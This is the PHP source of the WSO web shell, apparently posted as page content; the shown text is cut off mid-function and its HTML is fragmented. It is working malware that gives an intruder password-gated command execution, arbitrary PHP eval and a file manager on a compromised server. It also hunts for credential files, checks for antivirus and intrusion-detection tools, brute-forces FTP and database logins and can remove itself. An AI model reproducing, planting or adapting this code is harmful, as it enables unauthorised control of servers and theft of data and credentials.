December 12th 2017

Password:
"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ("Read" /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name:  "; echo "
"; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo "
send using AJAX
";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"

Search files:

Text:
Path:
Name:
"; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "".htmlspecialchars($item)."
"; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo "

Search for hash:





"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ""; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

Really want to remove the shell?
Yes
'; wsoFooter(); } function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return 